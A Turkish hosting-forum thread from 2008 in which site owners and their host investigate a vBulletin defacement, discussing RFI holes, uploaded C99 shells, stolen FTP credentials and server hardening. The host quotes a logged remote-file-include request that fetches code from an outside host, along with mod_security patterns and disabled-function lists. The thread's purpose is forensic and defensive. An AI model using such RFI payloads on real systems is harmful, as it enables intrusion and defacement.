Hacklendim :( | Ama niye,nasıl bilmiyorum ?

Question

Merhaba arkadaşlar.. saat 05:00 gibi vbulletin forumum hacklendi Nedir bu zihniyet anlamadım hala ? Neyse Ama nasıl yapmış hala çözmüş değilim indexde html açığı diyor.. Tüm html taglar kapalı topx yönlendirme gibi bi olay olmayacak şekilde.. + işin garip tarafı templatelerdede kod yok ama sitenin kaynağı görüntüle dediğimde şu çıktı adamın nickiyle aradım ÇIKAN; ' konusundaki ilk okunmamış mesaja git">

Ufuk Gedik · Answer

ghurjhan adlı üyeden alıntı:						mesajı görüntüle									Işte kişinin attığı index. İletişim adresini saklıyorum.
 		
efendim bize tüm ekran görüntülerini info@htservers.net adresine atarsanız sevinirim.evraklara ekleyeceğim.pazartesiye kadar süremiz mevcut.

Therns adlı üyeden alıntı:						mesajı görüntüle									Her Kafandan bir ses çıkmazsın bilen bilmeyen herkes konusuyor.
Bak Güsel Kardeşim....

1) Serverdan index yemissin ftp ile alakan yok ..
2) Systemine hiç bir zarar verilmemiş uyarılmıs...
3) Server alılarak config.php okunmus daha sonra config ile ftp bilgilerını aynı gırıysen index yemiş olabılırsın..
4) Veya sql ile baglanıp admin bilgilerını degıstırıp forumhome dan ındex atılmısta olabılır

HACKED olayına gelınce bu bir hack geğil uyarıdır.... 
Ortmdyz mail adresını yaz sana yardımcı olayım .... 		şuanda da sitelerin içeriğini değiştiren kardeşiniz için msn'de sizle görüşüyorum sanırım.
ayrıca 2 çeşit giriş mevcut.loglara göre.server yanlış kayıt yapmaz.
birinci olarak ftp'den login olunarak shell atılmış.
ikinci olarak scriptlerde bulunan rfi açıkları sayesinde shell atılmış ve sonrasında chmod 777 olan dizinlerde gezmişsiniz.

müşterilerinde dikkatine chmod 777 dizin bırakmayınız

Wiplex · Answer

tşkler Ufuk hocam  dikkat etmeye çalışırım...önerilerin için sağol

Abdlsmt! · Answer

Wiplex geçmiş olsun arkadaşım.. 
Sağol Ufuk abi bir kez daha büyük bir dertten kurtardın..
Ben yine eskisi gibi forumumu kullanabilirim galiba tema özel yapım kullandığım eklendiler 1.5 yıllık nerdeyse + vbulletin lisanslı yani lisansıyla indirdim..

Wiplex · Answer

Ortmdyz adlı üyeden alıntı:						mesajı görüntüle									Wiplex geçmiş olsun arkadaşım..  		ne yaptın bea  ben hacklenmedim benim bir muşteri vardı o hacklendiydi  o yuzden dikkat etmeye çalışacağım...
vbulettinde yinede bi guncelleme yap  ondaki herhangi bir açık tum vb cileri yakar gibi..
ustelik bu arada joomla 1.5 yeni kararlı surumu yeni bir guncelleme yaptı haberiniz olsun

Ufuk Gedik · Answer

vbulletin hangi sürümde bilmiyorum ama bakın burda açık var.mod_security engellemiş.

2008-02-09      16:00:56      91.121.75.11      /archive//classified_right.php?language_dir=http://adm-adserver.com/cmd.txt? HTTP/1.1      xxxxxxxx.com      Access denied with code 406. Pattern match "/(cmd|command)\.(gif|jpg|txt|bmp|png)\?" at THE_REQUEST [severity "EMERGENCY"]

Ufuk Gedik · Answer

Flood yapıyorum kusura bakmayın.

ip_ban.php ve ip_banned.php leri uploadını gösteren loglar.yani shell'leri upload eden kişi

ftp'den atılmış.yani keyloger yemiş birisi.

Alıntı										Feb  9 14:33:02 master pure-ftpd: (maksatpa@88.250.67.244) [NOTICE] /home/maksatpa//public_html/forum/inc/ip_ban.php uploaded  (46192 bytes, 64.03KB/sec)

Feb  9 14:33:05 master pure-ftpd: (maksatpa@88.250.67.244) [NOTICE] /home/maksatpa//public_html/forum/inc/ip_banned.php uploaded  (156305 bytes, 60.80KB/sec)
F 		
Düzenleme:
Pazartesi günü firma avukatımız Nurhan Hanım gerekli işlemleri başlatacaktır.
Gerekli evraklar tarafımca hazırlanmıştır.
http://www.htservers.net/mahkeme/dava.jpg
http://www.htservers.net/mahkeme/log.jpg

deli dana · Answer

hiç bişi olmazsa maddi tazminat davası aç 15 milyarlık

CashAsiq · Answer

Ufuk Gedik adlı üyeden alıntı:						mesajı görüntüle									vbulletin hangi sürümde bilmiyorum ama bakın burda açık var.mod_security engellemiş.
2008-02-09      16:00:56      91.121.75.11      /archive//classified_right.php?language_dir=http://adm-adserver.com/cmd.txt? HTTP/1.1      xxxxxxxx.com      Access denied with code 406. Pattern match "/(cmd|command)\.(gif|jpg|txt|bmp|png)\?" at THE_REQUEST [severity "EMERGENCY"] 		Bu Acik vbulletinin değil PhpBazar Scriptinin Dostum

PHPBazar Classified_right.PHP Remote File Include Vulnerability

// Neyse Konu Cozulmus Hakkınızı insallah alirsiniz Kardes.

ghurjhan · Answer

Işte kişinin attığı index. İletişim adresini saklıyorum.

kaantukek · Answer

hey Allah'm.. bakmayın arkadaşlar sisteminizde açık var dediklerine lamerler bir şekilde şifrenizi öğrenip değiştirmişlerdir indexinizi.. bunlar hep böyle index atıyorlar.. ÇÜNKÜ HAYATLARINDA HİÇ EMEK VERMEMİŞLER.. BİRŞEYİ 0'DAN VAR ETMEMİŞLER, EDEMEZLERDE..  edemedikleri için bu saçmasapan iş ile uğraşıyorlar..

ghurjhan · Answer

Büyük ihtimalle şifreyi bi yerden öğrenmişler gibime geliyo benimde. Ama nasıl. Şifremi ben bile zor hatırlarken.

Abdlsmt! · Answer

Benide kamashira hackledi..

Therns · Answer

Her Kafandan bir ses çıkmazsın bilen bilmeyen herkes konusuyor.
Bak Güsel Kardeşim....

1) Serverdan index yemissin ftp ile alakan yok ..
2) Systemine hiç bir zarar verilmemiş uyarılmıs...
3) Server alılarak config.php okunmus daha sonra config ile ftp bilgilerını aynı gırıysen index yemiş olabılırsın..
4) Veya sql ile baglanıp admin bilgilerını degıstırıp forumhome dan ındex atılmısta olabılır

HACKED olayına gelınce bu bir hack geğil uyarıdır.... 
Ortmdyz mail adresını yaz sana yardımcı olayım ....

DaRKTuRK · Answer

aynen katılıyorum  geçmiş olsun sanada kardeş

Elazığlı168 · Answer

Ufuk Gedik adlı üyeden alıntı:						mesajı görüntüle									Dediğim gibi kullandığınız scriptlerin güvenlik açıklarını sıkı takip edin.
Lamerler bu rfi açıklarını kullanarak zararlı kodlardan oluşan php sayfaları upload edebiliyorlar.
Kişisel bilgisayarınızda mutlaka bir antivirus kullanın.FTP ye yolladığınız dosyaları antivirus ile taratınız.
Forumlara,bloglara,portallara yeni tema kuracak müşterilerimiz.Çok sık yaşadık bu sorunu.
Özellikle vvarez tabir edilen yasadışı yada normal temaları sitelerinize kurarken dikkat edin.Tema dosyalarını antivirus ile taratın.Shell olursa uyarı verir zaten.
Yukarda yazdığım güvenlik ayarları server kurulduğu günden bu yana yapılı şekilde.Az birazda managed bilgisi olan biri bu ayarlarla dizinler arası geçilemeyeceğini bilir. 		
evet ufuk gerekli güvenlik ayarlarını tam yapmış bizde hemen hemen yakın disableleri kullanıyoruz bu disablelerle ayrıca mod_security de kuruluysa dizinler arası geçiş mümkün değil

CoMMaNDoS · Answer

Ya en çok güvendiğim sistem Joomla! dbde durup dururken 3-4 defa sorun çıktı en son yedeği atarak düzeltiyoruz ama bi son bulmadı gitti (:

Wiplex · Answer

inş hackledikleri sitenizden belli bir tazminat alırsınız..ama uyarı olarak yazması paçayı yırtması manasınada gelebilir..tam bir kanun var mı özel sitelerin ftp sine felan girilmesiyle onu tam bilmiyorum ama Ufuk arkadaşımız en doğruyu olanı yapmış...
Edit : joomla hakikatten baya sağlam bir sistem özelliklede kararlı surumleri 1.0.x en sağlamı sonra 1.5.x surumu geliyor gerçi 1.5.x de guncelleme vardı..

sagopa67 · Answer

ufuk bey en doğrusunu yapmışsınız umarım bazı lamerlere bu ders olur.

Ufuk Gedik · Answer

Wiplex adlı üyeden alıntı:						mesajı görüntüle									inş hackledikleri sitenizden belli bir tazminat alırsınız..ama uyarı olarak yazması paçayı yırtması manasınada gelebilir..tam bir kanun var mı özel sitelerin ftp sine felan girilmesiyle onu tam bilmiyorum ama Ufuk arkadaşımız en doğruyu olanı yapmış...
Edit : joomla hakikatten baya sağlam bir sistem özelliklede kararlı surumleri 1.0.x en sağlamı sonra 1.5.x surumu geliyor gerçi 1.5.x de guncelleme vardı.. 		bir bilgisayar sistemine ne olursa olsun izinsiz erişim sağlamak suçtur.
2 yıla kadar hapis cezası mevcut.

kesinlikle acıma,affetme gibi bir duygum yok.Müşterilerim adına ibret-i alem olması için işlemleri başlattım.Varsın sonuç çıkmasın.Burası Türkiye normaldir ama mahkemelerde sürünmesi ders olur.

Müşterilerede her ne kadar scriptlerinizi güncel tutun desekte nafile.Bir rfi çıktımı adam lap shell atıyor.Sabahtan beride kendim shell attım.Dizinler arası  geçiş sıfır.

lüpen · Answer

Ufuk Gedik adlı üyeden alıntı:						mesajı görüntüle									bir bilgisayar sistemine ne olursa olsun izinsiz erişim sağlamak suçtur.
2 yıla kadar hapis cezası mevcut.
kesinlikle acıma,affetme gibi bir duygum yok.Müşterilerim adına ibret-i alem olması için işlemleri başlattım.Varsın sonuç çıkmasın.Burası Türkiye normaldir ama mahkemelerde sürünmesi ders olur.
Müşterilerede her ne kadar scriptlerinizi güncel tutun desekte nafile.Bir rfi çıktımı adam lap shell atıyor.Sabahtan beride kendim shell attım.Dizinler arası  geçiş sıfır. 		kesinlikle. ilk defa hack yasadım aynı sunucudaki butun sitelerimi hacklemişler dosyaları karıstırmıslar butun siteleri bastan kurdum ne cektigimi ben bilirim.
okadar uyuz oldumki şu mahkeme işlemleri anlasam ne olursa olsun peşini bırakmıcaktım eger bidaha boyle durumda elimden gelen herşeyi yapıcam ibret olması için kesinlikle bunun yapılması gerek

Ufuk Gedik · Answer

Axi adlı üyeden alıntı:						mesajı görüntüle									kesinlikle. ilk defa hack yasadım aynı sunucudaki butun sitelerimi hacklemişler dosyaları karıstırmıslar butun siteleri bastan kurdum ne cektigimi ben bilirim.
okadar uyuz oldumki şu mahkeme işlemleri anlasam ne olursa olsun peşini bırakmıcaktım eger bidaha boyle durumda elimden gelen herşeyi yapıcam ibret olması için kesinlikle bunun yapılması gerek 		bizim sunucudamısınız?

Wiplex · Answer

Ufuk Hocam ne diyeyim en doğrusu yaptığın haklısın acıma yok : )) inş artık bu bir ders olur da ne biz nede siz hack işleriyle uğraşırız : )) tum temennimiz bu...

itz · Answer

Hocam aynısı geçen 5-6 ay önce başıma geldi bildiğim kadarıyla soluyorum ; vbulletin'inde top10 varsa ondan kaynaklıdır konunun adına o kodu yazdığı zaman top10 da çıkıyor ve site otomatik kendini yönlendiriyor.Top10 u kaldırırsan problem çözülücektir

TheMk · Answer

topx (sonkonular) script meta yı sansürle yada onu kaldır. yoksa vb kolay kolay hacklenmez. tabi bunun yanı sıra. serverdan'da hack yemış olabılırsın. server'dan config'i okuyup sql'dan ındex atmış olabılır. confıg'ide şifrele  derım ben.

Abdlsmt! · Answer

ama bende ki indexde hacked yazıyor uyarı felanda yazmıyor

Elazığlı168 · Answer

ya ne uyarısı hepsi palavra ben site hackleyen lamzorların hiç de iyi niyetle hack yaptıklarını sanmıyorum uyardık demeleri sadece işin kılıfı ciddi ciddi söylüyorum sitelerim imzamda bir hack grubu buyursun hackleyebiliyorsa hacklesin bağlı olduğu team ide kendisinide silerim net ten

Abdlsmt! · Answer

katılıyorum bencede uyarı yapayım derken siteyi de siliyor

ghurjhan · Answer

Ufuk Gedik adlı üyeden alıntı:						mesajı görüntüle									efendim bize tüm ekran görüntülerini info@htservers.net adresine atarsanız sevinirim.evraklara ekleyeceğim.pazartesiye kadar süremiz mevcut. 		Konu ile ilgili olarak mail gönderilmiştir.

ghurjhan · Answer

Aynı kişiler benim de 2 sitemi hacklediler dün gece.
Ufuk bey sağolsun hemen müdahale etti ve eski yedeklere döndük.

Ne kadar wp sitem varsa hepsini hacklemiş arkadaş. Bi de ipb forum sitemi hacklemiş. İlginç.
"Anti adultçu" bi grupmuş arkadaşlar.
DB'den kendilerine admin permissionu vermişler ve o şekilde admin paneline girmişler. Yanlız sanırım bu arkadaşlar biraz acemi yada iyi niyetli :S Admin paneline girip, sadece katgorileri silmiş/editlemişler. 
Anlamadım bende ne yapmak istediklerini ama.

Elazığlı168 · Answer

Sansürleme seçeneklerinden <script> , location kelimelerini yasakla baya eski bir açık

CashAsiq · Answer

Abdlsmt! · Answer

arkadaşlar sonunda yönlendirmeyi silmeyi başardım.. ama adam dedi ki senin db bilgilerini alırım dedi 5 dk sonra verdi bilgileri bu nasıl oluyor ya ?
 
hatta ve hatta kodu tablolarda buldum ÖRN: datastore(forumcache), therad tablolarında

Elazığlı168 · Answer

servere sızmış bir an önce host değiştir server seninse disable_functions , safe mode gibi ayarları yap

CashAsiq · Answer

Evet Elazığlı168 dostumun dedigi gibi Servera Sızmıs

Serverin Safe Mode Durumu : Off VE dizinler arasi gecme durmu olabilir .

Server Safe Mode On : Fakat Bypass Teknikleri ile configin okunmus olabilir.

// Server Sahibi Sensen Guvenlik Olayi için Yardim Alman Gerekiyor.

// Sen Değilsen Bu Durumu Server Sahibine ilet yahut tasin oradan.

Wiplex · Answer

servera girmişler..bu işler çok hızlı gerçekleşiyo hemen bir yedek al diyeceğim ama olan olmuş zaten...yinede bi yedek al db ye yazık...gerisini hostunu aldığın kişi yapar ona haber ver. kapatır belli yerleri safe mod felan..

CashAsiq · Answer

+ Loglari Topla Adami TehdiT et hatta git sikayet et msn konusmalarini Topla Serverdan da loglari al git sikayet et.+ Bu Db bilgilerini veririrm diyen elemanin Netteki nikini bana bir pm lesene

Abdlsmt! · Answer

tehdit edecek bir şey yokki adam who is inde donunun rengine kadar vermiş
+ galiba yeni farkettim <script> sansürlememişim daha doğrusu sansürlüydü forumu geri aldığımda o ana denk gelmiş.. Lakin bu adam nasıl yapabiliyorda benim db bilgilerimi hemen açığa çıkardı..
 
O değilde shell bile soksa bana msnde dedi ki shell vercem sana onu at ftp'ne  ben forumunu düzeltirim dedi..
 
bende düşündüm tüm r10 üyeleri toplansa tek bi kelime dese "Hassssssssssss"

Elazığlı168 · Answer

eski bir yedeği yeni bir db adı şifresiyle db oluştur yükle öncekini sil php şifreleyiciler var config.php yi şifrele göremez

Abdlsmt! · Answer

Alıntı										 eski bir yedeği yeni bir db adı şifresiyle db oluştur yükle öncekini sil  		arif abi bundan kastın nedir ? yani forumu gerimi alayım ?

Elazığlı168 · Answer

eski bi sql yedeğini yeni bir db oluşturup yükle şu an ki db artık riskli bir db kullanılmamalı geriye dön işin sağlam olsun

Wiplex · Answer

Gakkoş kızmaz inş  hem bende elazığlıyım.. yerine cevap verdeğimde ..yani db nin içindeki kodları al siteyi tamammen sil sonra yeni bir db oluştur ve kodları oraya gir...demek istediği bu galiba

Abdlsmt! · Answer

olabilr.. MySQL Arama özelliğiyle arattırdım nickini kama diye 3 tabloda çıktı.. Bunları replace ettim eski db ile thereadıda onun olduğu veriyi sildim..

Wiplex · Answer

orda msn adresi felan yazmıyomuydu ? ver işte mahkemeye nasıl olsa msn e evden giriyodur yada e-mailine hele birde ttmail ise...sonra adama de  msn adresin bende sıkıysa hackle 3 gun sonra veririm polise.. dahada bişey yapamaz ( tabi yanlış e-mail değilse doğrulama gerektiriyosa) ghurjhan ortalık lamer dolu ama beyaz hackerde olabilir

Abdlsmt! · Answer

benim resellerde Ufuk beyden.. peki seni hackleyenin nicki ney ?

batubilir · Answer

Öncelikle geçmiş olsun
birşey sormak istiyorum vbulletin versiyonlariniz kaç ?

ghurjhan · Answer

Wiplex adlı üyeden alıntı: mesajı görüntüle

inş hackledikleri sitenizden belli bir tazminat alırsınız..ama uyarı olarak yazması paçayı yırtması manasınada gelebilir..tam bir kanun var mı özel sitelerin ftp sine felan girilmesiyle onu tam bilmiyorum ama Ufuk arkadaşımız en doğruyu olanı yapmış...
Edit : joomla hakikatten baya sağlam bir sistem özelliklede kararlı surumleri 1.0.x en sağlamı sonra 1.5.x surumu geliyor gerçi 1.5.x de guncelleme vardı..

Hayır bi de siteye üye olup yorum yapmış bu arkadaş. Daha sonra kendisini admin yapmış. Admin olduktan sonra ilk işlem olarak ta üyeleri düzenleme kısmına index atmış. Attığı indexteki mail adresini, üyelikteik mail adresini ve yine bu IP numaraları elimde zaten. Tekrar durumunda kendisiyle ben değil avukatım ilgilenecek. Bu "tekrar durumunu" beklememin sebebi ise zarar vermemesidir. Dediğim gibi iyi niyet hackeri (!) olabilir belki.

Umarım öyledir. Yoksa başına çok kötü şeyler gelebilir. 
Bu arada sitesi hacklenen biri dava açtığında tazminat talep edebiliyo sanırım.Bunun maximum boyutu nedir ? Bilgisi olan varmı ?

MSN adresini ekleyip muhabbet etmek istiyorum kendisiyle. Çok merak ediyorum amacı neymiş.

Ufuk Gedik · Answer

Aranızda wordpress kullanan  varmı yada joomla ?
Varsa eğer açıklama yapıcam konuyla ilgili..

İşin yasal boyutuyla ilgilide bilgi vericem.

ghurjhan · Answer

Evet. WP sitelerimden 2'sini index atmışlar.

Wiplex · Answer

ghurjhan adlı üyeden alıntı:						mesajı görüntüle									Mailini aldım zaten. Ve hiçbi zamanda anlamamışımdır. Hackleyen kişiler neden iletişim bilgilerini yazarlar. Bi aldatmaca mı acaba diye düşünürüm hep. 
Hayır bi de siteye üye olup yorum yapmış bu arkadaş. Daha sonra kendisini admin yapmış. Admin olduktan sonra ilk işlem olarak ta üyeleri düzenleme kısmına index atmış. Attığı indexteki mail adresini, üyelikteik mail adresini ve yine bu IP numaraları elimde zaten. Tekrar durumunda kendisiyle ben değil avukatım ilgilenecek. Bu "tekrar durumunu" beklememin sebebi ise zarar vermemesidir. Dediğim gibi iyi niyet hackeri (!) olabilir belki. 
Umarım öyledir. Yoksa başına çok kötü şeyler gelebilir. 
Bu arada sitesi hacklenen biri dava açtığında tazminat talep edebiliyo sanırım.Bunun maximum boyutu nedir ? Bilgisi olan varmı ?
MSN adresini ekleyip muhabbet etmek istiyorum kendisiyle. Çok merak ediyorum amacı neymiş. 		Benim bildiğim kadar bu hacker felan değil lamer olsa gerek.. 
 bir hacker 
1) e-mail adresi sahte veya geçersiz mail olur
2) cafeden yapar adam bu işi yakalanma payını katarsan 
3) ustelikte bir e-mail adresi vermesi tamamen saçmalık ustu...
4)bir hacker hiç bir zaman iz birakmaz...beyazda siyahda olsa iz bırakmaz
waraez paylaşım yoksa git ver bence aklı başına gelir...
Ufuk Gedik  ben joomla kullanıyorum  iyi olur bizi bilgilendirirsen

Abdlsmt! · Answer

Alıntı										 Aynı kişiler benim de 2 sitemi hacklediler dün gece.
Ufuk bey sağolsun hemen müdahale etti ve eski yedeklere döndük.

Ne kadar wp sitem varsa hepsini hacklemiş arkadaş. Bi de ipb forum sitemi hacklemiş. İlginç.
"Anti adultçu" bi grupmuş arkadaşlar.
DB'den kendilerine admin permissionu vermişler ve o şekilde admin paneline girmişler. Yanlız sanırım bu arkadaşlar biraz acemi yada iyi niyetli :S Admin paneline girip, sadece katgorileri silmiş/editlemişler. 
Anlamadım bende ne yapmak istediklerini ama. 		Ufuk abi burada belirtmiş WP var

Ufuk Gedik · Answer

Wordpress sistemlerin hepsinin içinde ip_ban.php diye listpath çıktı.
Hepsi aynı olduğuna göre ya bir modülünde açık var,yada sürümü indirdiğiniz paketin içinde mevcut bu dosya.
ip_ban.php dosyasının bulunduğu klasörün chmodunu inceledim.hepsi 645.yani dışardan yazma yetkisi yok.

/home/maksatpa/publi ... um/inc/ip_banned.php  infected: Virtool.PHP.C99Shell.B

Results:
Folders           :52389
Files             :248583
Packed            :22945
Infected files    :1
Suspect files     :0
Warnings          :0
Identified viruses:1
I/O errors        :0
Files/second      :231
Scan time         :00:17:53

[root@master ~]# 		
Safe mode on durumda sunucuda.
Ayrıca php_openbasedir enable durumda.
Shell Fork Bomb Protection enable durumda.

" shell_exec, passthru, ini_alter, dl, openlog, syslog, readlink, symlink, link, leak, popen, escapeshellcmd, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, escapeshellarg, pcntl_exec "
komutlarıda engellenmiş durumda.

joomla modüllerindede açık var.lütfen müşterilerimiz bunları takip etsinler ve güncellesinler.zaten sunucuya en çok zarar joomla'dan değil,modüllerinden geliyor.

ghurjhan · Answer

Edit... Pardon

Abdlsmt! · Answer

yani sorun benden kaynaklanan bir şey değildi değilmi Ufuk abi ??

Ufuk Gedik · Answer

Dediğim gibi kullandığınız scriptlerin güvenlik açıklarını sıkı takip edin.
Lamerler bu rfi açıklarını kullanarak zararlı kodlardan oluşan php sayfaları upload edebiliyorlar.
Kişisel bilgisayarınızda mutlaka bir antivirus kullanın.FTP ye yolladığınız dosyaları antivirus ile taratınız.

Forumlara,bloglara,portallara yeni tema kuracak müşterilerimiz.Çok sık yaşadık bu sorunu.
Özellikle vvarez tabir edilen yasadışı yada normal temaları sitelerinize kurarken dikkat edin.Tema dosyalarını antivirus ile taratın.Shell olursa uyarı verir zaten.

Yukarda yazdığım güvenlik ayarları server kurulduğu günden bu yana yapılı şekilde.Az birazda managed bilgisi olan biri bu ayarlarla dizinler arası geçilemeyeceğini bilir.